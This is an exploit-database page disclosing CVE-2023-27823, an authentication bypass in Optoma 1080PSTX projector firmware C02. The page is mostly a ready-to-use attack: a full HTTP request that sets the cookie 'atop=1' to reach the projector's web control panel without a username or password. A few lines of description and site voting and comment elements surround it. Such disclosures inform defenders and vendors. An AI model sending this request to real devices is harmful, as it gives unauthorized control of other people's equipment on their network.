Optoma 1080PSTX Firmware C02 Authentication Bypass

2023.05.10

Credit: Anthony Cole

Risk: High

Local: No

Remote: Yes

CVE: CVE-2023-27823

CWE: N/A

# Exploit Title: Optoma 1080PSTX Firmware C02 - Auth Bypass
# Date: 2023/05/09
# Exploit Author: Anthony Cole
# Contact: http://twitter.com/acole76
# Website: http://twitter.com/acole76
# Vendor Homepage: http://optoma.com
# Version: Optoma 1080PSTX Firmware C02
# Tested on: N/A
# CVE : CVE-2023-27823

Details
By default the web interface of the 1080PSTX requires a username and password to access the application control panel.  However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1".

GET /index.asp HTTP/1.1
Host: projector
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: atop=1
Connection: close

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Optoma 1080PSTX Firmware C02 Authentication Bypass

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.